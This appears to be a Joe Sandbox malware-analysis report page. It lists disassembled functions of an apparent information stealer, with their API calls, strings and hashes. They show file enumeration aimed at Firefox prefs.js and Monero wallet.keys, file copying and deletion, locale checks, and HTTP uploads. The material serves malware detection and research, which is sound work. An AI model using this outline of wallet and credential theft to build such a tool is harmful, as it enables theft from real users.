Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 399ba4432eaa8fcb116ffc7d4a297cdf3a3dc669d5849d96b93b2e4a32f05265
Instruction ID: 251bcc3cba8a04cd9ee682d097dc2b0382ded0a4d9ba637ebdeffec0badc97b1
Opcode Fuzzy Hash: 399ba4432eaa8fcb116ffc7d4a297cdf3a3dc669d5849d96b93b2e4a32f05265
Instruction Fuzzy Hash: 826112B1910218ABCB24EBA0DC45FEA737CBB88701F044598F609A7181EE75EB858F91

Function 00924880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00924915
StrCmpCA.SHLWAPI(?,006FE9D8), ref: 0092493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00924ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00940DDB,00000000,?,?,00000000,?,",00000000,?,006FE9A8), ref: 00924DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00924E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00924E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00924E49
InternetCloseHandle.WININET(00000000), ref: 00924EAD
InternetCloseHandle.WININET(00000000), ref: 00924EC5
HttpOpenRequestA.WININET(00000000,006FE988,?,006FE400,00000000,00000000,00400100,00000000), ref: 00924B15

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

InternetCloseHandle.WININET(00000000), ref: 00924ECF

Strings

", xrefs: 00924D33
", xrefs: 00924BF2
------, xrefs: 00924B28
------, xrefs: 00924C69
------, xrefs: 009249BD

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 2c55477f5437dbfbc24c7319a0724e8c886653e52f965e59f2312d62d0fa1102
Instruction ID: 14216f5fec0592fda5fc82cd9adbccf16451b028803429423abdf16804e6c8c9
Opcode Fuzzy Hash: 2c55477f5437dbfbc24c7319a0724e8c886653e52f965e59f2312d62d0fa1102
Instruction Fuzzy Hash: AC12B972910218AADB15EB90DC92FEEB779AF94300F504199F14673091EF742F49CF66

Function 00933EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00933EC3
FindFirstFileA.KERNEL32(?,?), ref: 00933EDA
StrCmpCA.SHLWAPI(?,00940FAC), ref: 00933F08
StrCmpCA.SHLWAPI(?,00940FB0), ref: 00933F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0093406C
FindClose.KERNEL32(000000FF), ref: 00934081

Strings

%s\%s, xrefs: 00933EB7

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 5f1236884c4a900528f0f98e104dbba9861f5dfdf61bd9ba834e114d4e98f997
Instruction ID: 41c174e06e8eef46c9dca72f613e5e0d868a5fc4421919276769e8e3cf3b1166
Opcode Fuzzy Hash: 5f1236884c4a900528f0f98e104dbba9861f5dfdf61bd9ba834e114d4e98f997
Instruction Fuzzy Hash: 0C5115B5900218ABCB24EBB0DC85FEA737CBB94300F404598F65997180DF75EB858F95

Function 0092F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009415B8,00940D96), ref: 0092F71E
StrCmpCA.SHLWAPI(?,009415BC), ref: 0092F76F
StrCmpCA.SHLWAPI(?,009415C0), ref: 0092F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0092FAB1
FindClose.KERNEL32(000000FF), ref: 0092FAC3

Strings

prefs.js, xrefs: 0092F812

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 1329d3463fff5e3ab8ede74fd68c2ed1abc3416304a7aad98164c92f0ccc8f6c
Instruction ID: bbfdad0818441c128928076b44a1f77e3fa02f704b5abfac249b5db9c34b87ad
Opcode Fuzzy Hash: 1329d3463fff5e3ab8ede74fd68c2ed1abc3416304a7aad98164c92f0ccc8f6c
Instruction Fuzzy Hash: EAB13E71900118ABDB24FB60DC96FEE7379AFD4300F4085A8E54A97195EF346B49CF92

Function 009216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0094510C,?,?,?,009451B4,?,?,00000000,?,00000000), ref: 00921923
StrCmpCA.SHLWAPI(?,0094525C), ref: 00921973
StrCmpCA.SHLWAPI(?,00945304), ref: 00921989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00921D40
DeleteFileA.KERNEL32(00000000), ref: 00921DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00921E20
FindClose.KERNEL32(000000FF), ref: 00921E32

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Strings

\*.*, xrefs: 009217F1

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: a15b804d6a663cf7f5019c35dadec5e2a8582b7e34840675c0f627644e68143c
Instruction ID: ab0b2bae9f502d8cda696402695492de3e301d30dcab4c14bd30db51228900b7
Opcode Fuzzy Hash: a15b804d6a663cf7f5019c35dadec5e2a8582b7e34840675c0f627644e68143c
Instruction Fuzzy Hash: AB121271910118ABDB19FB60DC96FEE737CAF94300F414599B14AA6091EF706F89CFA2

Function 0092DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009414B0,00940C2A), ref: 0092DAEB
StrCmpCA.SHLWAPI(?,009414B4), ref: 0092DB33
StrCmpCA.SHLWAPI(?,009414B8), ref: 0092DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0092DDCC
FindClose.KERNEL32(000000FF), ref: 0092DDDE

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 8753edea53fd8bd4210dbdf761e1eaad3a8971da2e0966864cd55dc9de1ef889
Instruction ID: 0878d2f5e8656eceb84d17d753cc1d4aa87e004d51fe68e2a5b59f8a4347485c
Opcode Fuzzy Hash: 8753edea53fd8bd4210dbdf761e1eaad3a8971da2e0966864cd55dc9de1ef889
Instruction Fuzzy Hash: 67912172900114ABCB14FB70EC96EED737DAFD4300F408668F94A96195EE34AB598F93

Function 00937B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

GetKeyboardLayoutList.USER32(00000000,00000000,009405AF), ref: 00937BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00937BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00937C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00937C62
LocalFree.KERNEL32(00000000), ref: 00937D22

Strings

/ , xrefs: 00937C7F

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
